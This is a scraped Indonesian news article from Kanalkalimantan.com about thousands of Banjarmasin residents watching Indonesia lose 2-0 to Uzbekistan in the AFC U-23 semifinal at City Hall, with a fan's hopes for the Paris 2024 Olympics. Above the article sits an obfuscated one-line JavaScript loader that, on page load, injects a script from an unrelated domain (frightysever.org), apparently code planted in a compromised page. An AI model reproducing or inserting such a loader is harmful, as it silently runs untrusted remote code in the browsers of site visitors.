(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024


KANALKALIMANTAN.COM, BANJARMASIN – Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman Balai Kota Banjarmasin Provinsi Kalimantan Selatan dipadati ribuan penonton, Senin (29/4/2024) malam.

Pecinta sepak bola dari berbagai umur di Kota Banjarmasin rela duduk berdesakan untuk menyaksikan pertandingan babak empat besar tersebut. Bahkan tidak sedikit warga yang hadir beberapa jam sebelum pertandingan dimulai pukul 22.00 Wita.

Bukan hanya dari kalangan laki-laki, tak sedikit kaum perempuan juga menyempatkan waktu untuk hadir menyaksikan pertandingan dari layar videotron.

Sebelum pertandingan dimulai, lagu Indonesia Pusaka dan Tanah Airku bergema dinyanyikan oleh seluruh penonton yang hadir. Pun ketika lagi Indonesia Raya berkumandang dari Stadion Abdullah bin Khalifa, penonton di Banjarmasin ikut menyanyikan.

Baca juga: Kadis Pariwisata Tala dan Bendahara Disidang Kasus Korupsi Retribusi Asuransi Wisata

Bendera Merah Putih yang terbuat dari kain dengan panjang 30 meter dan lebar 3 meter dibentangkan di depan kantor Balai Kota Banjarmasin, menambah semangat nasionalisme penonton yang hadir.

Tak hanya videotron halaman Balai Kota yang dimanfaatkan sebagai layar tayangan, dua buah layar tambahan disediakan Polresta Banjarmasin diletakan di Jalan RE Martadinata.

Halaman Balai Kota pun tak sanggup menampung ribuan penonton yang hadir, hingga penonton melebur sampai ke jalan umum.

Sorakan keras penonton terdengar diparuh kedua waktu pertandingan saat pemain Indonesia berhasil membobol gawang Uzbekistan, namun sayangnya gol tersebut dianulir wasit  karena VAR menganggap salah seorang pemain Indonesia lebih dahulu offside.

Baca juga: Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

Hingga menit akhir pertandingan, tim Garuda Muda harus menerima kekalahan dari Uzbekistan dengan skor 2-0.

Syahri (45), salah seorang warga Banjarmasin yang nonton di halaman Balai Kota Banjarmasin  mengaku bangga dengan timnas Indonesia mampu masuk ke semi final AFC U-23, meskipun telah kehilangan kesempatan meraih juara.

Namun kata Syahri, Timnas Indonesia masih ada harapan untuk meraih juara ketiga jika menang melawan tim Arab Saudi di laga selanjutnya. Dan berkesempatan besar untuk masuk Olimpiade Paris 2024.

“Masih ada harapan juara ketiga, juara keempat pun ada harapan tampil di olimpiade menunggu juara empat Afrika,” ujarnya optimis.

Baca juga: Merancang Kota Metropolitan di Kalsel dari RPJPD Kota Banjarbaru 2025-2045

Acara nobar Indonesia vs Uzbekistan yang difasilitasi oleh Pemko Banjarmasin bersama Polresta Banjarmasin itu disediakan berbagai macam doorprez bagi penonton yang beruntung. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

9 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

10 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

11 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

11 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

12 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

13 jam ago

This website uses cookies.